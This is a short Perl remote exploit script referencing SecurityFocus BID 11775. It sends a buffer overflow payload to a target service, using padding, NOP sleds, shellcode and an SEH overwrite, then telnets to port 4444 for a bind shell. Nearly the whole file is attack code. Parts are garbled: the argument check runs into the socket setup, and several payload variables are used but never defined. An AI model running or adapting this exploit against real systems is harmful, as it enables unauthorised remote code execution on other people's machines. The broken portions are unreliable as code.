#!/usr/bin/perl
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>\’tcp\’, PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\\n";
sleep(1);
my $request=("\\x45" x7420).("\\x90" x10).$happy.("\\x90" x14).$shellcode.("\\x41" x8).$nextseh.$seh.("\\x90" x5).$jmp.("\\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host …\\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net